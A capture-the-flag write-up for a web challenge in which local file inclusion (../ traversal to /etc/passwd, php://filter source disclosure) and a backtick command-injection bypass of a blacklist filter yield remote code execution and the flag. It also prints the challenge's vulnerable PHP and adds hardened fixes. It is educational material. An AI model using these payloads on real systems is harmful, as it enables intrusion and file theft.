## [See original writeup on site](https://barelycompetent.dev/post/ctfs/2021-04-11-ritsecctf/#dababyweb)

> Dababy wanted to share a message, but he seemed to put it too high up...
>
> 34.72.118.158:6284
>
> Author: Darkfowl

Navigating to the site, we see:

> "Dababy has his secret message hidden somwhere, but how can we read it?"
>
> * Dababy's Name Judgement
> * Dababy's Images

The first page, Dababy's Name Judgement, provides a textbox that we can input data into, and the input is echoed back to us with

> "**\<input\>** Is a Cool Name Lesss Go!"

So it seems like we are going to be able to exploit this, depending on how the service is written. Before I got into the textbox, I looked at the other page option, Dababy's Images.

When navigating there, notice the form of the URL:

* http://34.72.118.158:6284/fun1.php?file=suge

**/fun1.php?file=suge** is a dead giveaway for LFI on easy web challenges. Trying `/fun1.php?file=../../../../../etc/passwd` for example, we get back the `/etc/passwd` contents:

```none
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
```

When we enter a path to a file that does not exist, the resulting error reveals the path of the currently running script. E.g., `/fun1.php?file=../../../../../etc/fooooo` gives:

> Warning: include(../../../../../etc/fooooo): failed to open stream: No such file or directory in /var/www/html/fun1.php on line 5
>
> Warning: include(): Failed opening '../../../../../etc/fooooo' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/html/fun1.php on line 5

So, since we have LFI already, I tried another trick: the `php://filter` stream wrapper with `convert.base64-encode`, which makes `include` return the file's contents base64-encoded instead of executing them as PHP. Combining this with the path leaked above, we are able to read the source code of the page:

```none
http://34.72.118.158:6284/fun1.php?file=php://filter/convert.base64-encode/resource=/var/www/html/fun1.php
```


The response is a base64 blob; decoding it gives us the source of `fun1.php`:

```php

<style type="text/css">
html, body{width: 100%; height: 100%; padding: 0; margin: 0}
div{position: absolute; padding: 0em; border: 1px solid #000}
#nw{top: 10%; left: 0; right: 50%; bottom: 50%}
#ne{top: 0; left: 50%; right: 0; bottom: 50%}
#sw{top: 50%; left: 0; right: 50%; bottom: 0}
#se{top: 50%; left: 50%; right: 0; bottom: 0}
</style>

<div id="nw"></div>
<div id="ne"></div>
<div id="sw"></div>
<div id="se"></div>
```
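The listing above only shows the markup; the `include` on line 5 that the warnings mention is where the `file` parameter ends up. As an added example (not the challenge's code), here is how the images page could be written so that `file` can only select from a fixed set of fragments, which closes both the `../` traversal and the `php://filter` wrapper trick at once. The `$fragments` map, the `fragments/` directory and the file names in it are assumptions made for this example.

```php
<?php
// Added example, not the challenge's source: a hardened version of fun1.php.
// The "file" query value is used only as a key into a fixed map, so neither a
// traversal string like "../../../../../etc/passwd" nor a wrapper such as
// "php://filter/..." can ever reach include(). The fragment names and paths
// below are assumptions made for this example.

$fragments = [
    'suge'    => 'suge.php',
    'dababy2' => 'dababy2.php',
];
$fragmentDir = __DIR__ . '/fragments';

/**
 * Map a user-supplied key to an allowlisted fragment path, or return null if
 * the key is missing, not a string, or unknown. No path is ever built from
 * the raw input itself.
 */
function resolveFragment(array $allowed, string $dir, $key): ?string
{
    if (!is_string($key) || !array_key_exists($key, $allowed)) {
        return null;
    }
    $path = realpath($dir . '/' . $allowed[$key]);
    $base = realpath($dir);
    // Defence in depth: even a mistaken entry in the map cannot escape $dir.
    if ($path === false || $base === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$path = resolveFragment($fragments, $fragmentDir, $_GET['file'] ?? null);

if ($path === null) {
    // Generic error: no include path, file name or line number is echoed back.
    http_response_code(404);
    echo 'Unknown image';
    exit;
}

include $path;
```

The path disclosure in the two warnings above comes from `display_errors` being enabled; turning it off in production hides `/var/www/html/fun1.php` from the response, but it does not fix the include, which is why the allowlist is the real change here.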

Likewise, we should be able to read the other page, `fun.php`; requesting it the same way gives us the following after base64 decoding:

```php

<html
<div style="background-image: url('/img/dababy2.jpg')"
height= 100%;
background-size: cover;
<head>
<title>DaBaby Cool Name Convertable</title>
</head>
<body>

<form action="fun.php" method="get">
Enter a cool name:


<input type="text" name="string" value="Your name!">
<input type="submit">


Dababy's Response:
</form>
= 40){
echo "Dababy says that's a long name";
}
else
{
if (strpos($name, 'ls') == false && (strpos($name, ';') !== false || strpos($name, '&') !== false || strpos($name, '|') !== false)) {

$_SESSION['count']++;
if ($_SESSION['count'] == 1){
echo "Dababy say's no peaking";
}
if ($_SESSION['count'] == 2){
echo "Dababy said no peaking";
}
if ($_SESSION['count'] >= 3){
echo '';
}
}
else
{
if (strpos($name, 'secr3t') !== false){
echo "Dababy say's no peaking";
}
else
{
$_SESSION['count'] = 0;
echo shell_exec('echo '.$_GET['string'].' | xargs /var/www/html/dababy.sh');
}
}
}
?>


</body>
</html>
```

Nice. So we can see the filter that is being applied to the input text box, as well as the script that the input is passed to (`dababy.sh`). I took a peek at `dababy.sh` using the same method, and it is just this:

```bash
# decode the base64 returned by the php://filter request for dababy.sh
$ echo ZWNobyAiJDEgSXMgYSBDb29sIE5hbWUgTGVzc3MgR28hIgo= | base64 -d
echo "$1 Is a Cool Name Lesss Go!"
```

So, if we go back to the name judgement page, we can try inputting something like this to get direct RCE:

```bash
`base64 dababy.sh`
```

As that will expand to:

```bash
echo "`base64 dababy.sh` Is a Cool Name Lesss Go!"
```

and it passes the filter above, since it contains none of the blocked characters (`;`, `&`, `|`). As proof:

* `http://34.72.118.158:6284/fun.php?string=%60base64+dababy.sh%60` (that payload) gives:

```bash
ZWNobyAiJDEgSXMgYSBDb29sIE5hbWUgTGVzc3MgR28hIgo= Is a Cool Name Lesss Go!
```
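The filter in `fun.php` is a blacklist of a few shell characters applied to a string that is then spliced into a shell command line, and the backtick payload above is exactly the kind of syntax such a list misses. As an added example, not the challenge's code, the snippet below builds the original command string next to a hardened one that passes the name as a single quoted argument via `escapeshellarg()`, so the shell treats the whole value as data. It only constructs and prints the two strings (nothing is executed), so it is safe to run locally with `php`; the `dababy.sh` path is the one shown on the page, and the sample names are constructed.

```php
<?php
// Added example, not the challenge's source. Builds the two command lines side
// by side without executing anything, so it can be run with `php` offline.

const SCRIPT = '/var/www/html/dababy.sh'; // path as shown on the page

// The original construction: the raw query value is concatenated into a shell
// command line, so any shell syntax inside the name is still interpreted, and
// xargs additionally splits the value on whitespace before calling the script.
function buildVulnerable(string $name): string
{
    return 'echo ' . $name . ' | xargs ' . SCRIPT;
}

// Hardened: the name becomes one single-quoted argument. escapeshellarg() wraps
// the value in single quotes and escapes any embedded single quote, so backticks
// and every other shell metacharacter are passed through as literal text. The
// "echo | xargs" pipeline is not needed at all: the script receives $1 directly.
function buildHardened(string $name): string
{
    return escapeshellarg(SCRIPT) . ' ' . escapeshellarg($name);
}

// Length limit kept from the original, applied before anything else.
function tooLong(string $name): bool
{
    return strlen($name) >= 40;
}

// Constructed sample inputs: a benign name and the payload from the writeup.
$samples = [
    'Bob',
    "`base64 dababy.sh`",
    str_repeat('A', 40),
];

foreach ($samples as $name) {
    if (tooLong($name)) {
        echo "rejected (too long): $name\n\n";
        continue;
    }
    echo "input:      $name\n";
    echo "vulnerable: " . buildVulnerable($name) . "\n";
    echo "hardened:   " . buildHardened($name) . "\n\n";
}
```

For the payload the hardened line comes out as `'/var/www/html/dababy.sh' '`base64 dababy.sh`'`, which the shell passes to the script unchanged, so `dababy.sh` simply echoes the literal backtick string back. On PHP 7.4 and later, `proc_open()` also accepts the command as an array, which skips the shell entirely and removes the need for escaping at all.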

Now we just need to find the flag/message. Starting with where we currently are:

```bash
`pwd`
# gives "/var/www/html Is a Cool Name Lesss Go!"
```

Looking for the flag in there was not successful. Trying one directory up:

```bash
`ls ../`
# gives "flag.txt Is a Cool Name Lesss Go!"
```

There it is. Just cat it:

```bash
`cat ../flag.txt`
# gives "RS{J3TS0N_M4D3_4N0TH3R_0N3} Is a Cool Name Lesss Go!"
```

Flag is `RS{J3TS0N_M4D3_4N0TH3R_0N3}`.